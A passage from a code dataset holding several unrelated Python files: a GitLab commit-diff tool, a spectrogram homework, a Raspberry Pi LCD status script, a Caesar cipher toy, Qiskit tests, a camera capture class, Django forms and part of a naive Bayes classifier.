open(deeper_file_name + \"/\" + j['name'], \"w\", encoding='utf-8') as f:\n _name = self.specify_folder + \"/\" + file_path + \"/Cfgs/\" + j['name']\n # print(file_path + \": \" + _name)\n # print(deeper_file_name + \"/\" + j['name'])\n # print(\"_name:\", _name)\n # continue\n f.write(self._project.files.get(_name, ref=self.target_branche).decode().decode())\n except Exception:\n print(\"exception file name: \", deeper_file_name + \"/\" + j['name'])\n break\n # print(\"index: \", index)\n # 保存日志到当前目录(.txt)\n def save_log(self, e):\n array = e.get(1.0, tk.END)\n if len(array) == 1:\n messagebox.showerror('错误', '没有日志可保存!')\n return\n now_time = get_now_time()\n if not os.path.exists('配置文件夹'):\n os.mkdir('配置文件夹')\n if not os.path.exists('配置文件夹\\日志'):\n os.mkdir('配置文件夹\\日志')\n filename = now_time.replace(':', '_')\n filename = ''.join([os.getcwd(), '\\配置文件夹\\日志\\分支提交差异日志_', filename, '.txt'])\n with open(filename, 'w') as f:\n f.write(array)\n self.insert_info('日志保存成功, 路径为<%s>\\n' % filename, 1, 1)\n messagebox.showinfo('', '保存成功')\n\n def button_download(self):\n if len(self.target_info) <= 1:\n self.insert_info(\"未发现差异信息\", 1, 1)\n return\n for _ in self.target_info[1:]:\n if _[-2] == 2:\n self.insert_info(str(_))\n\n def change_filter(self, ent):\n _value = ent.get()\n if len(_value.split(', ')) < 1:\n self.insert_info(\"输入过滤条件异常: %s !请检查是否满足格式xx, xx, xx\" % _value, 1, 2)\n return\n self.filters = _value.split(', ')\n self.insert_info(\"修改过滤条件成功: %s\" % _value, 1, 1)\n\n def change_date(self, ent):\n _value = ent.get()\n if len(_value.split('-')) == 3:\n self.target_branche_create_time = _value\n self.insert_info(\"分支创建时间修改成功: %s\" % _value, 1, 1)\n else:\n self.insert_info(\"修改失败! 请检查时间格式是否满xx-xx-xx :%s\" % _value, 1, 2)\n\n def choose_project(self, com1, com2, com3):\n project_name = com1.get()\n try:\n self._client = gitlab.Gitlab(PROJECT_INFO[project_name][0], private_token=PROJECT_INFO[project_name][1])\n self._client.auth()\n except Exception:\n self.insert_info(str(sys.exc_info()), 1, 2)\n self.insert_info(\"登录成功\", 1, 1)\n # projects = client.projects.list() # 获取所有项目信息\n self._project = self._client.projects.get(id=PROJECT_INFO[project_name][2]) # 获取对应项目\n # logs = project.commits.list(ref_name=\"master\", since=\"2020-03-05T11:01:23.000+07:00\") # 获取对应分支 某事件后的提交信息\n branches = self._project.branches.list(all=True, order_by=\"created_at\")\n # files = self._project.files.get\n self._branches = {}\n for i in branches:\n self._branches.update({i.name: getattr(i, \"commit\").get('created_at')})\n com2['values'] = list(self._branches.keys())\n # com3['values'] = list(self._branches.keys())\n # for _ in branches:\n # print(_)\n self.insert_info(\"获取《%s》项目分支信息成功!\" % project_name, 1, 1)\n\n def choose_branch(self, com2):\n target = com2.get()\n if target not in self._branches.keys():\n self.insert_info(\"《%s》分支不存在!\" % target, 1, 2)\n return\n self.target_branche = target\n self.insert_info(\"选中《%s》分支成功!\" % target, 1, 1)\n\n def choose_branch_3(self, com3):\n target = com3.get()\n if target not in self._branches.keys():\n self.insert_info(\"《%s》分支不存在!\" % target, 1, 2)\n return\n self._master_name = target\n self.insert_info(\"选中《%s》分支成功!\" % target, 1, 1)\n\n def button_check_git(self):\n print('选中分支名为: %s, time: %s ' % (self.target_branche, self._branches[self.target_branche]))\n # create_time = self._client.commits.list(ref_name=self.target_branche)\n # brache = self._project.branches.get(self.target_branche)\n # print('目标分支信息: %s' % brache)\n # 1.5.0分支创建时间:2020-04-23 16:37:07 +0800\n # TODO 如果获取分支创建时间\n # self.target_branche_create_time = \"2020-03-13 16:37:07 +0800\"\n logs_target = self._project.commits.list(ref_name=self.target_branche, all=True,\n since=self.target_branche_create_time)\n logs_master = self._project.commits.list(ref_name=self._master_name, all=True,\n since=self.target_branche_create_time)\n self.target_info = [{\"描述\": 480, \"日期\": 120, \"作者\": 40, \"提交id\": 160}]\n master_info = [self.target_info[0]]\n # index = 3(过滤) or 2(未匹配到) or 1(匹配成功) 0(无色)\n for info in logs_target:\n index = 0\n if self.filter_title(self.filters, info.title):\n index = 3\n self.target_info.append([info.title, info.created_at[:-10], info.committer_name, info.id, index, 0])\n for info in logs_master:\n index = 0\n if self.filter_title(self.filters, info.title):\n index = 3\n master_info.append([info.title, info.created_at[:-10], info.committer_name, info.id, index, 0])\n del logs_target\n del logs_master\n index_tar = 0\n for info in self.target_info[1:]:\n index_tar += 1\n # 不匹配过滤单位\n if info[-2] == 3:\n continue\n exist = False\n index_mat = 0\n for _info in master_info[1:]:\n index_mat += 1\n # 不匹配过滤单位\n if info[-2] == 3:\n continue\n if info[0] == _info[0]:\n info[-2] = 1\n info[-1] = index_mat\n _info[-2] = 1\n _info[-1] = index_tar\n print(\"找到相同项: %s\" % info[0])\n exist = True\n continue\n if not exist:\n info[-2] = 2\n for _ in self.target_info[1:]:\n if _[-2] == 2:\n print(str(_))\n GitTopUiInfo(\"master与分支提交检查\", master_info, self.target_info)\n\n def insert_info(self, information, use_time=0, tag=0):\n if use_time:\n time = get_now_time() + ': '\n else:\n time = ''\n if tag == 0:\n this_tag = ''\n elif tag == 1:\n this_tag = 'tag1'\n elif tag == 2:\n this_tag = 'tag2'\n self.tex.insert(tk.END, time + information + '\\n', this_tag)\n\n def filter_title(self, rule, target):\n if not isinstance(rule, list):\n rule = [rule]\n for _ in rule:\n if _ in target:\n return True\n return False\n","sub_path":"page/sixth.py","file_name":"sixth.py","file_ext":"py","file_size_in_byte":14343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"287153379","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io as sp\nfrom numpy.fft import fft, fftshift, ifft, ifftshift\n\n## Helper Functions\n\n# Converts a given frequency into the corresponding note name\ndef freq2note(freq):\n if freq < 25 or freq > 4190:\n return \"\"\n key_num = int(round(12 * np.log2(freq / 440) + 49))\n octave = int(np.floor((key_num + 8) / 12))\n note_index = key_num % 12 - 1\n if note_index == -1:\n note_index = 11\n notes = ['A', 'A#', 'B', 'C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#']\n return notes[note_index] + str(octave)\n\n# Converts a given note name into the frequency\ndef note2freq(note):\n if len(note) == 3:\n note_name = note[0:2]\n octave = int(note[2])\n elif len(note) == 2:\n note_name = note[0]\n octave = int(note[1])\n else:\n return 0\n notes = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']\n\n note_index = notes.index(note_name)\n key_num = note_index + 4 + (12 * (octave - 1))\n return np.power(2, (key_num - 49) / 12) * 440\n\n# Convert a frequency into the corresponding index in order to set limits\n# on the y-axis of the spectrogram\ndef getFreqIndex(ks, freq):\n index = ks.searchsorted(freq)\n index = np.clip(index, 1, len(ks) - 1)\n left = ks[index - 1]\n right = ks[index]\n index -= freq - left < right - freq\n return index\n\n# Given a spectrogram and threshold value, returns the list of note names that have a amplitude\n# larger than the threshold, inserting empty strings where no note is found\ndef getNotes(spectrogram, ks, threshold):\n max_freq_ind = np.argmax(spectrogram, axis=0)\n max_freq = np.max(spectrogram, axis=0)\n max_freq_ind[max_freq < threshold] = 0\n note_frequencies = ks[max_freq_ind]\n notes = np.array([freq2note(frequency) for frequency in note_frequencies])\n return notes, note_frequencies\n\n# Discards parts of the spectrogram outside of the given min and max frequencies\ndef clipSpectrogram(spectrogram, ks, min_freq, max_freq):\n min_freq_ind = getFreqIndex(ks, min_freq)\n max_freq_ind = getFreqIndex(ks, max_freq)\n\n spectrogram = spectrogram[min_freq_ind:max_freq_ind, :]\n ks = ks[min_freq_ind:max_freq_ind]\n\n return spectrogram, ks\n\n# Takes the song matrices imported from matlab and returns the song vector and sample rate.\ndef getSongMatData(song):\n y = song['y'].flatten()\n Fs = song['Fs'].flatten()[0]\n return y, Fs\n\n\n# Takes song vector and sample rate and returns the total number of samples, \n# length in seconds, time vector, and shifted frequency vector\ndef getSongData(y, Fs):\n n = len(y)\n song_length = n / Fs\n t = np.arange(0, n) / Fs\n k = np.append(np.arange(0, n/2), np.arange(-n/2, 0)) / song_length\n ks = fftshift(k)\n return n, song_length, t, ks\n\n# Creates a spectrogram by first splitting it into parts and then stitching those partial\n# spectrograms together\ndef createSpectrogramSplit(y, Fs, num_parts, num_windows, filter_width, log_transform, debug_plot = False):\n y_parts = np.split(y, num_parts)\n spectrogram = np.zeros((len(y_parts[0]), 0))\n all_taus = np.array([])\n for i, yi in enumerate(y_parts):\n print(\"Part: \" + str(i + 1) + \" / \" + str(num_parts))\n\n _, song_length, _, _ = getSongData(yi, Fs)\n\n spectrogram_partial, taus, ks = createSpectrogram(yi, Fs, num_windows, filter_width, log_transform, debug_plot)\n all_taus = np.hstack((all_taus, taus + song_length * i))\n\n spectrogram = np.hstack((spectrogram, spectrogram_partial))\n\n return spectrogram, all_taus, ks\n\n# Creates a spectrogram of a given song vector\ndef createSpectrogram(y, Fs, num_windows, filter_width, log_transform, debug_plot = False):\n n, _, t, ks = getSongData(y, Fs)\n\n taus = np.linspace(0, t[-1], num_windows)\n spectrogram = np.zeros((n, num_windows))\n\n for i, tau in enumerate(taus):\n print(\"Progress: \" + str(i + 1) + \" / \" + str(num_windows))\n gauss = np.exp(-filter_width * (t - tau)**2)\n window = y * gauss\n y_transform = fftshift(fft(window))\n\n if log_transform:\n spectrogram[:, i] = np.log(np.abs(y_transform) + 1)\n else:\n spectrogram[:, i] = np.abs(y_transform)\n\n if debug_plot and i == int(num_windows / 4):\n plt.plot(t, gauss)\n plt.show()\n\n plt.plot(t, y * gauss)\n plt.show()\n\n plt.plot(ks, y_transform)\n plt.show()\n\n return spectrogram, taus, ks\n\n# Plots a spectrogram\ndef plotSpectrogram(spectrogram, taus, ks, title=\"\"):\n plt.pcolormesh(taus, ks, spectrogram, shading='gourad', cmap='hot')\n plt.colorbar()\n plt.title(title, size=28)\n plt.xlabel(\"Time\", size=24)\n plt.ylabel(\"Frequency\", size=24)\n\n# Adds text annotations of note names to a spectrogram\ndef labelNotes(notes, taus, note_frequencies):\n prev_note = \"\"\n for i, note in enumerate(notes):\n if note != prev_note:\n note_txt = note\n if len(note) == 3:\n note_txt = \"$\\mathregular{\" + note[0] + \"^\\\\\" + note[1] + \"_\" + note[2] + \"}$\"\n elif len(note) == 2:\n note_txt = \"$\\mathregular{\" + note[0] + \"_\" + note[1] + \"}$\"\n plt.annotate(note_txt, (taus[i], note_frequencies[i]), color='b', weight='bold', fontsize=22)\n prev_note = note\n\n# Plots a spectrogram with note names added\ndef plotSpectrogramWithNotes(spectrogram, taus, ks, threshold, title=\"\"):\n plotSpectrogram(spectrogram, taus, ks, title)\n notes, note_frequencies = getNotes(spectrogram, ks, threshold)\n labelNotes(notes, taus, note_frequencies)\n plt.show()\n\n# Load data from MATLAB matrices\ngnr = sp.loadmat('GNR.mat')\nfloyd = sp.loadmat('Floyd.mat')\n\n## Part 1\n# Create Spectrogram and Label Notes for GNR\ny, Fs = getSongMatData(gnr)\n\nspectrogram, taus, ks = createSpectrogram(y, Fs, num_windows=100, filter_width=500, log_transform=True)\n\n# Normalize spectrogram\nspectrogram = spectrogram / np.amax(spectrogram)\n\n# Throw away values outside normal music range for performance reasons\nspectrogram, ks = clipSpectrogram(spectrogram, ks, min_freq=0, max_freq=1000)\n\nplotSpectrogramWithNotes(spectrogram, taus, ks, threshold=.3, title=\"Spectrogram of Guns N' Roses Sample\")\n\n\n# Create Spectrogram and Label Notes for Floyd\ny, Fs = getSongMatData(floyd)\ny = y[0:-1]\n\nspectrogram, taus, ks = createSpectrogramSplit(y, Fs, num_parts=10, num_windows=25, filter_width = 50, log_transform=True)\n\n# Normalize spectrogram, crop to desired area\nspectrogram = spectrogram / np.amax(spectrogram)\nspectrogram, ks = clipSpectrogram(spectrogram, ks, min_freq=0, max_freq=1000)\n\nplotSpectrogramWithNotes(spectrogram, taus, ks, threshold=.5, title=\"Spectrogram of Pink Floyd Sample\")\n\n\n## Part 2\ny, Fs = getSongMatData(floyd)\ny = y[0:-1]\n\nn, _, _, ks = getSongData(y, Fs)\n\n# Take Fourier Transform and apply a band pass filter to isolate the bass\ny_transform = fftshift(fft(y))\nlf = 60\nhf = 150\nband_filter = np.zeros(n)\nband_filter[getFreqIndex(ks, lf):getFreqIndex(ks, hf)] = 1\n\ny_transform_filtered = y_transform * band_filter\ny_filtered = ifft(ifftshift(y_transform_filtered))\n\n# Now create the spectrogram as above, except using the filtered version\nspectrogram_bass, taus, ks = createSpectrogramSplit(y_filtered, Fs, num_parts=10, num_windows=25, filter_width=5, log_transform=True)\n\n# Normalize spectrogram, crop to desired area\nspectrogram_bass = spectrogram_bass / np.amax(spectrogram_bass)\nspectrogram_bass, ks = clipSpectrogram(spectrogram_bass, ks, min_freq=50, max_freq=160)\n\nplotSpectrogramWithNotes(spectrogram_bass, taus, ks, threshold=.5, title=\"Spectrogram of Isolated Bass Guitar from Pink Floyd Sample\")\n\n## Part 3\ny, Fs = getSongMatData(floyd)\ny = y[0:-1]\nn, _, _, ks = getSongData(y, Fs)\n\ny_transform = fftshift(fft(y))\nlf = 150\nhf = 20000\nband_filter = np.zeros(n)\nband_filter[getFreqIndex(ks, lf):getFreqIndex(ks, hf)] = 1\n\ny_transform_filtered = y_transform * band_filter\ny_filtered = ifft(ifftshift(y_transform_filtered))\n\n# Now create the spectrogram as above, except using the filtered version\nspectrogram, taus, ks = createSpectrogramSplit(y_filtered, Fs, num_parts=10, num_windows=25, filter_width=5, log_transform=True)\n\n# Normalize spectrogram, crop to desired area\nspectrogram = spectrogram / np.amax(spectrogram)\nspectrogram, ks = clipSpectrogram(spectrogram, ks, min_freq=0, max_freq=1200)\n\n# Get the bass note names\nbass_notes, _ = getNotes(spectrogram_bass, ks, threshold=.5)\n\novertone_filters = np.zeros(spectrogram.shape)\n\nfor i, note in enumerate(bass_notes):\n # Find the frequency of each note to construct the overtones from\n freq = note2freq(note)\n\n num_overtones = 15\n gauss_filters = np.zeros((spectrogram.shape[0], num_overtones))\n # Construct a Gaussian filter for each overtone\n for overtone_num in range(num_overtones):\n filter_width = .005\n center_frequency = freq * (overtone_num + 1)\n gauss_filters[:, overtone_num] = np.exp(-filter_width* (ks - center_frequency)**2) / (overtone_num + 1)\n # Add up all the Gaussian filters and invert it\n combined_filter = 1 - np.sum(gauss_filters, axis=1)\n\n # Add the filter for each time point\n overtone_filters[:, i] = combined_filter\n\n# Apply the filter to the spectrogram\nspectrogram_no_overtones = spectrogram * overtone_filters\n\nplotSpectrogram(overtone_filters, taus, ks, title=\"Spectrogram of Filter to Remove Overtones\")\nplt.show()\n\nplotSpectrogramWithNotes(spectrogram_no_overtones, taus, ks, threshold=.25, title=\"Spectrogram of Pink Floyd Sample w/o Bass Guitar, Filtered to Remove Overtones\")\n\nplotSpectrogramWithNotes(spectrogram, taus, ks, threshold=.5, title=\"Spectrogram of Pink Floyd Sample w/o Bass Guitar, No Filter Applied\")","sub_path":"HW 2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":9768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"146005378","text":"#!/usr/bin/python\n# Example using a character LCD connected to a Raspberry Pi or BeagleBone Black.\nfrom subprocess import *\nfrom time import sleep, strftime\nfrom datetime import datetime\nimport math\n\nimport Adafruit_CharLCD as LCD\nimport Adafruit_DHT\n\n# Commands\ncmd = \"ip addr show eth0 | grep inet | awk '{print $2}' | cut -d/ -f1\"\n\ndef run_cmd(cmd):\n p = Popen(cmd, shell=True, stdout=PIPE)\n output = p.communicate()[0]\n return output\n\ndef roundy(val):\n return math.ceil(val*100)/100\n\n# Raspberry Pi pin configuration:\nlcd_rs = 25 # Note this might need to be changed to 21 for older revision Pi's.\nlcd_en = 24\nlcd_d4 = 23\nlcd_d5 = 17\nlcd_d6 = 21\nlcd_d7 = 22\nlcd_backlight = 4\n\n# Define LCD column and row size for 16x2 LCD.\nlcd_columns = 16\nlcd_rows = 2\n\n# Initialize the LCD using the pins above.\nlcd = LCD.Adafruit_CharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,\n lcd_columns, lcd_rows, lcd_backlight)\n\nwhile True:\n lcd.clear()\n ipaddr = run_cmd(cmd)\n date = datetime.now().strftime('%b %d %H:%M:%S')\n lcd.message(date)\n lcd.message('\\nIP %s' % ( ipaddr ) )\n sleep(5)\n\n lcd.clear()\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.AM2302, 14)\n \n lcd.message('Temp: %sC' % str(roundy(temperature)))\n lcd.message('\\nHumidity: %s' % str(roundy(humidity)))\n sleep(5)\n\n \n","sub_path":"projects/sensors/lcd_ip.py","file_name":"lcd_ip.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"415677107","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\ninstala_requisitos=[ # Funciona só no Linux a princípio. Rodar no Windows: pip3 install pyfiglet colorama\n 'pyfiglet',\n 'colorama'\n]\n\nimport os\nfrom pyfiglet import Figlet\nfrom colorama import Fore, Back, Style\nfrom unicodedata import normalize\n\n# FUNÇÕES\ndef dasegArt():\n custom_fig = Figlet(font='digital')\n print(Fore.RED + custom_fig.renderText('....CaesarBruteForce_v2.3....'))\n custom_fig = Figlet(font='cosmic')\n print(Style.DIM + custom_fig.renderText(' DASEG'))\n custom_fig = Figlet(font='digital')\n print(Style.NORMAL + custom_fig.renderText('..Developed by PsyDeciphers..'))\n\ndef encryptCaesar(string, shift): # Realiza criptografia de Cesar\n# https://www.thecrazyprogrammer.com/2018/05/caesar-cipher-in-python.html\n cipher = ''\n for char in string: \n if char == ' ':\n cipher = cipher + char\n elif char.isupper():\n cipher = cipher + chr((ord(char) + shift - 65) % 26 + 65)\n else:\n cipher = cipher + chr((ord(char) + shift - 97) % 26 + 97)\n return cipher\n\ndef bfCaesar(encryptedWord): # Função que realiza força bruta em palavra criptografada\n letras = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n with open('resultados_bfCaesar.txt', 'w') as resultados:\n for chave in range(len(letras)):\n resultado = ''\n for letra in encryptedWord.upper(): \n if letra in letras:\n num = letras.find(letra)\n num = num - chave\n if num < 0:\n num = num + len(letras)\n resultado = resultado + letras[num]\n else:\n resultado = resultado + letra\n resultados.write(\"%s\\n\" % resultado.lower())\n print ('Chave #%s: %s' % (chave, resultado))\n resultados.close()\n with open('resultados_bfCaesar.txt', encoding=\"ISO-8859-1\") as file1:\n with open('dictionary_brazilian.dic', encoding=\"ISO-8859-1\") as file2:\n same = set(file1).intersection(file2)\n\n same.discard('\\n')\n same2 = list(same)\n print (Fore.GREEN)\n print ('Palavra encontrada---> %s' % (same2[0].upper()))\n print (Fore.RED)\n\n with open('palavraEncontrada.txt', 'w') as file_out:\n for line in same:\n file_out.write(line)\n return 0\n\ndef cls(): # Função para limpar a tela\n os.system('cls') or None # Windows\n os.system('clear') or None # Linux\n\ndef removeAcentos(texto):\n return normalize('NFKD', texto).encode('ASCII', 'ignore').decode('ASCII')\n\n# FLUXO PRINCIPAL \nloop = True\nwhile loop:\n dasegArt()\n escolha = int(input('Escolha uma opção:\\n1- Criptografar uma palavra com Cesar \\n2- Força bruta em arquivo de texto \\n3- Limpar tela \\n4- Sair\\n\\nSua escolha? ' ))\n cls() \n if escolha==1: \n dasegArt()\n print ('Opção escolhida: Criptografar uma palavra com Cesar\\n')\n textoClaro = input('Insira uma palavra para criptografar: ')\n textoClaro = textoClaro.replace(\" \",\"\")\n s = int(input('\\nEscolha a chave entre 1~25: '))\n encrypted = encryptCaesar(removeAcentos(textoClaro), s)\n print ('\\nPalavra criptografada: %s' % (encrypted));\n gravar = input('\\nDeseja salvar no arquivo palavraCifradaCaesar.txt (S/N)? ')\n if gravar.upper() == 'S':\n saida = open('palavraCifradaCaesar.txt', 'w')\n saida.write(encrypted)\n saida.close()\n\n elif escolha==2:\n dasegArt()\n print ('Opção escolhida: Força bruta em arquivo de texto \\n')\n arquivoEntrada = open('palavraCifradaCaesar.txt', 'r')\n encryptedWord = arquivoEntrada.read()\n arquivoEntrada.close()\n bfCaesar(encryptedWord)\n\n elif escolha==3:\n cls()\n\n elif escolha==4:\n print ('Fechando...')\n loop=False\n\n else: # Qualquer entrada fora do intervalo de 1~5 retornará a mesagem de erro\n print('Opção errada! Tente novamente.\\n')\n","sub_path":"cripto_CaesarBruteForce/Caesar_BruteForce_v2.3.py","file_name":"Caesar_BruteForce_v2.3.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"490256032","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2018, IBM.\n#\n# This source code is licensed under the Apache License, Version 2.0 found in\n# the LICENSE.txt file in the root directory of this source tree.\n\n\n\"\"\"Test backend name resolution for functionality, via groups, deprecations and\naliases.\"\"\"\n\nfrom qiskit import IBMQ, BasicAer, LegacySimulators\nfrom qiskit.providers.legacysimulators import QasmSimulator\nfrom qiskit.providers.exceptions import QiskitBackendNotFoundError\nfrom .common import (QiskitTestCase,\n is_cpp_simulator_available,\n requires_cpp_simulator,\n requires_qe_access)\n\n\nclass TestBackendNameResolution(QiskitTestCase):\n \"\"\"\n Test backend name resolution algorithms.\n \"\"\"\n\n def test_deprecated(self):\n \"\"\"Test that deprecated names map the same backends as the new names.\n \"\"\"\n for provider in (BasicAer, LegacySimulators):\n deprecated_names = provider._deprecated_backend_names()\n\n for oldname, newname in deprecated_names.items():\n if newname in ('qasm_simulator',\n 'statevector_simulator') and not is_cpp_simulator_available():\n continue\n\n with self.subTest(provider=provider, oldname=oldname, newname=newname):\n try:\n resolved_newname = _get_first_available_backend(provider, newname)\n real_backend = provider.get_backend(resolved_newname)\n except QiskitBackendNotFoundError:\n # The real name of the backend might not exist\n pass\n else:\n self.assertEqual(provider.backends(oldname)[0], real_backend)\n\n @requires_qe_access\n def test_aliases(self, qe_token, qe_url):\n \"\"\"Test that display names of devices map the same backends as the\n regular names.\"\"\"\n IBMQ.enable_account(qe_token, qe_url)\n aliased_names = IBMQ._aliased_backend_names()\n\n for display_name, backend_name in aliased_names.items():\n with self.subTest(display_name=display_name,\n backend_name=backend_name):\n try:\n backend_by_name = IBMQ.get_backend(backend_name)\n except QiskitBackendNotFoundError:\n # The real name of the backend might not exist\n pass\n else:\n backend_by_display_name = IBMQ.get_backend(display_name)\n self.assertEqual(backend_by_name, backend_by_display_name)\n self.assertEqual(backend_by_display_name.name(), backend_name)\n\n def test_aliases_fail(self):\n \"\"\"Test a failing backend lookup.\"\"\"\n self.assertRaises(QiskitBackendNotFoundError, BasicAer.get_backend, 'bad_name')\n\n def test_aliases_return_empty_list(self):\n \"\"\"Test backends() return an empty list if name is unknown.\"\"\"\n self.assertEqual(BasicAer.backends(\"bad_name\"), [])\n\n def test_deprecated_cpp_simulator_return_no_backend(self):\n \"\"\"Test backends(\"local_qasm_simulator_cpp\") does not return C++\n simulator if it is not installed\"\"\"\n name = \"local_qasm_simulator_cpp\"\n backends = LegacySimulators.backends(name)\n if is_cpp_simulator_available():\n self.assertEqual(len(backends), 1)\n self.assertIsInstance(backends[0] if backends else None, QasmSimulator)\n else:\n self.assertEqual(len(backends), 0)\n\n\nclass TestSimulatorBackendNames(QiskitTestCase):\n \"\"\"\n Test deprecated names from providers.\n \"\"\"\n @requires_cpp_simulator\n def test_legacy_deprecated(self):\n \"\"\"test deprecated legacy simulators backends are resolved correctly\"\"\"\n old_name = 'local_qiskit_simulator'\n new_backend = LegacySimulators.get_backend(old_name)\n self.assertIsInstance(new_backend, QasmSimulator)\n\n\ndef _get_first_available_backend(provider, backend_names):\n \"\"\"Gets the first available backend.\"\"\"\n if isinstance(backend_names, str):\n backend_names = [backend_names]\n\n for backend_name in backend_names:\n try:\n return provider.get_backend(backend_name).name()\n except QiskitBackendNotFoundError:\n pass\n\n return None\n","sub_path":"test/python/test_backend_name_resolution.py","file_name":"test_backend_name_resolution.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"95377354","text":"#!/usr/bin/env python3\nimport picamera\nimport sys\nimport os\nimport warnings\nimport time\nfrom timeit import default_timer as timer\nfrom datetime import datetime\nimport traceback\n\nsys.path.append(os.path.abspath(os.path.join(\n os.path.dirname(__file__), \"../models\")))\n\nfrom frame_data import FrameData\nfrom row_data import RowData\n\nsys.path.append(os.path.abspath(os.path.join(\n os.path.dirname(__file__), \"../detection\")))\n\nfrom line import Line\n\nclass CaptureThreshold():\n __frame_processor_queue = None\n __camera = None\n __line_processor = None\n __width = 32\n __height = 32\n __framerate = 30\n\n def __init__(self, queue, width, height, framerate, set_speed):\n self.__framerate = framerate\n self.__frame_processor_queue = queue\n self.__width = width\n self.__height = height\n self.__line_processor = Line(queue, set_speed)\n self.__camera = picamera.PiCamera(resolution='{:d}x{:d}'.format(width, height), framerate=framerate)\n self.__camera.start_preview()\n # Wait for 3s to settle\n time.sleep(3)\n\n def write_pgm(self, filename, w, h, data):\n with open(filename, 'wb') as f:\n f.write(\"P5\\n{:d} {:d}\\n255\\n\".format(w, h).encode('utf8'))\n f.write(data)\n\n \n def start_capture(self, threshold, stretch, save):\n data = bytearray(b'\\0' * (self.__width * (self.__height * 2)))\n start = timer()\n prev = start\n i = 0\n # total = 0\n folderName = \"captures/\" + datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n if not os.path.exists(folderName):\n os.makedirs(folderName)\n\n try:\n for foo in self.__camera.capture_continuous(data, 'yuv', use_video_port=True):\n i = i + 1\n if save:\n # Save original\n self.write_pgm(\"{:s}/grayscale_{:d}.pgm\".format(folderName, i), self.__width, self.__height, data)\n\n self.__line_processor.process_bytearray(data, self.__width, self.__height, threshold, stretch, i)\n\n if save:\n # Save result\n self.write_pgm(\"{:s}/processed_{:d}.pgm\".format(folderName, i), self.__width, self.__height, data)\n\n now = timer()\n t = now - prev\n #print(\"Frame time: {}, processing took: {}\".format(t, proc_time))\n prev = now\n\n print(\"{:d} frames in {}, {} fps\".format(i, now - start, i / (now - start)))\n except Exception as e:\n print(e)\n traceback.print_exc()\n\n\n\n def stop_capture(self):\n if self.__camera:\n self.__camera.stop_preview()\n # exit(0)\n\n\nif __name__ == '__main__':\n lineDetector = CaptureThreshold()\n lineDetector.start_capture(32,32, True, True, True)\n timer.suspend(3)\n lineDetector.stop_capture()","sub_path":"dev/pi/libs/diycv/camera/capture_threshold.py","file_name":"capture_threshold.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"146341652","text":"from django import forms\n\nfrom .models import Component, Structural\n\nclass ComponentCreationForm(forms.ModelForm):\n class Meta:\n model = Component\n fields = [\n 'name',\n 'file',\n ]\n\nclass StructuralSelectionForm(forms.ModelForm):\n component_list = forms.ModelChoiceField(\n queryset=Component.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n )\n conferma = forms.ChoiceField(\n required=False,\n choices=[(False, 'No'), (True, 'Si')],\n )\n\n class Meta:\n model = Structural\n fields = (\n 'name',\n 'component_list',\n )\n\nclass StructuralMappingForm(forms.Form):\n porte = forms.ChoiceField(\n choices=[('port1', 'port1'), ('port2', 'port2'), ('port3', 'port3')],\n required=True,\n label='Mapping'\n )\n\n def __init__(self, *args, **kwargs):\n # port_list !C identity\n port_list = kwargs.pop('port_list')\n identity = kwargs.pop('identity')\n # print(self.fields['porte'])\n port_list = [(e, e) for e in port_list]\n # print(port_list)\n self.declared_fields['porte'].choices = port_list\n super(StructuralMappingForm, self).__init__(*args, **kwargs)\n \nclass StructuralFinalizeForm(forms.Form):\n entity_name = forms.CharField(\n max_length=50,\n )\n architecture_name = forms.CharField(\n max_length=50\n )","sub_path":"vhdl/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"246825638","text":"# -*-coding:utf-8-*-\nimport article\nimport jieba\nimport jieba.analyse\nimport json\n\nfrom naiveBayesClassifier.trainedData import TrainedData\nfrom naiveBayesClassifier import tokenizer\nfrom naiveBayesClassifier.trainer import Trainer\nfrom naiveBayesClassifier.classifier import Classifier\n\nclass NaiveBayesClassifier:\n def __init__(self):\n jieba.set_dictionary('dict.big.txt')\n self.articleTrainer = Trainer(tokenizer)\n\n def train(self):\n # Training\n articles = article.create_articles_from_file(\"data/HatePoliticsdata.json\")\n p_train = articles[0:3001]\n p_test = articles[3001:3031]\n\n for a in p_train:\n doc = a.body\n #seg_list = jieba.lcut(doc, cut_all=False)\n seg_list = jieba.analyse.extract_tags(doc)\n doc = \" \".join(seg_list)\n self.articleTrainer.train(doc, 'politics')\n\n articles = article.create_articles_from_file(\"data/Gossipingdata.json\")\n g_train = articles[0:3000]\n g_test = articles[3001:3301]\n\n for a in g_train:\n doc = a.body\n #seg_list = jieba.lcut(doc, cut_all=False)\n seg_list = jieba.analyse.extract_tags(doc)\n doc = \" \".join(seg_list)\n self.articleTrainer.train(doc, 'gossiping')\n f = open('data/docCountOfClasses.json', 'w', -1, 'utf-8')\n f.write(json.dumps(self.articleTrainer.data.docCountOfClasses))\n f.close()\n f = open('data/frequencies.json', 'w', -1, 'utf-8')\n f.write(json.dumps(self.articleTrainer.data.frequencies))\n f.close()\n \n\n def classify(self, article):\n self.data = TrainedData()\n f = open('data/docCountOfClasses.json', 'r', -1, 